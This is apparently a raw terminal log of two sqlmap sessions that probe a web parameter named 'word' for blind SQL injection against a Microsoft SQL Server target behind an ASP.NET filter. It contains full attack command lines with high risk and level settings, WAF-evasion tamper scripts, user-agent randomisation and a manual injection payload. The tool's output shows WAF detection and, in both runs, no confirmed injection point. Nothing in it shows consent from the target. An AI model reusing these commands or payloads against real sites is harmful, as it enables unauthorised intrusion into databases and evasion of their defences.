
C:q>sqlmap.py -r "C:UsersAdministratorDesktop3.txt" -p "word" --risk="3" --level="5" --test-filter="AND boolean-based blind - WHERE or HAVING clause" --dbms="Microsoft SQL Server" --dbs --tamper=between,charencode,charunicodeencode,equaltolike --flush-session --random-agent
___
__H__
___ ___[.]_____ ___ ___ {1.3.10.27#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:41:45 /2019-11-06/

[13:41:45] [INFO] parsing HTTP request from 'C:UsersAdministratorDesktop3.txt'
[13:41:47] [INFO] loading tamper module 'between'
[13:41:56] [INFO] loading tamper module 'charencode'
[13:42:05] [INFO] loading tamper module 'charunicodeencode'
[13:42:06] [WARNING] tamper script 'charunicodeencode' is only meant to be run against ASP or ASP.NET web applications
[13:42:09] [INFO] loading tamper module 'equaltolike'
[13:42:09] [WARNING] tamper script 'equaltolike' is unlikely to work against PostgreSQL
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] y
[13:42:13] [WARNING] using too many tamper scripts is usually not a good idea
[13:42:17] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:14.0) Gecko/20120405 Firefox/14.0a1' from file 'C:qdatatxtuser-agents.txt'
[13:42:26] [WARNING] it appears that you have provided tainted parameter values ('word='AND 1%3dcast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'%3d'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
it appears that provided value for GET parameter 'word' has boundaries. Do you want to inject inside? (''AND 1%3dcast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'%3d*'') [y/N] y
[13:42:33] [INFO] flushing session file
[13:42:33] [INFO] testing connection to the target URL
[13:42:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[13:42:38] [CRITICAL] WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)'
are you sure that you want to continue with further target testing? [Y/n] y
[13:42:43] [INFO] testing if the target URL content is stable
[13:42:44] [INFO] target URL content is stable
[13:42:44] [WARNING] heuristic (basic) test shows that GET parameter 'word' might not be injectable
[13:42:44] [INFO] heuristic (XSS) test shows that GET parameter 'word' might be vulnerable to cross-site scripting (XSS) attacks
[13:42:44] [INFO] testing for SQL injection on GET parameter 'word'
[13:42:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:42:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[13:43:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[13:43:06] [WARNING] GET parameter 'word' does not seem to be injectable
[13:43:06] [CRITICAL] all tested parameters do not appear to be injectable
[13:43:06] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times

[*] ending @ 13:43:06 /2019-11-06/


C:q>sqlmap.py -r "C:UsersAdministratorDesktop3.txt" -p "word" --risk="3" --level="5" --test-filter="AND boolean-based blind - WHERE or HAVING clause" --dbms="Microsoft SQL Server" --dbs --flush-session --random-agent
___
__H__
___ ___[']_____ ___ ___ {1.3.10.27#dev}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:12:22 /2019-11-06/

[14:12:22] [INFO] parsing HTTP request from 'C:UsersAdministratorDesktop3.txt'
[14:12:22] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Firefox/2.0.0.12 (Debian-2.0.0.12-0etch1)' from file 'C:qdatatxtuser-agents.txt'
[14:12:28] [WARNING] it appears that you have provided tainted parameter values ('word='AND 1%3dcast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'%3d'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
it appears that provided value for GET parameter 'word' has boundaries. Do you want to inject inside? (''AND 1%3dcast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'%3d*'') [y/N] y
[14:12:34] [INFO] flushing session file
[14:12:34] [INFO] testing connection to the target URL
[14:12:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:12:35] [CRITICAL] WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)'
are you sure that you want to continue with further target testing? [Y/n] y
[14:12:37] [WARNING] please consider usage of tamper scripts (option '--tamper')
[14:12:37] [INFO] testing if the target URL content is stable
[14:12:37] [INFO] target URL content is stable
[14:12:37] [WARNING] heuristic (basic) test shows that GET parameter 'word' might not be injectable
[14:12:37] [INFO] testing for SQL injection on GET parameter 'word'
[14:12:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:12:39] [WARNING] reflective value(s) found and filtering out
[14:12:39] [INFO] GET parameter 'word' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[14:12:41] [INFO] checking if the injection point on GET parameter 'word' is a false positive
[14:12:42] [WARNING] false positive or unexploitable injection point detected
[14:12:44] [WARNING] GET parameter 'word' does not seem to be injectable
[14:12:44] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment')
[14:12:44] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times

[*] ending @ 14:12:44 /2019-11-06/
     
 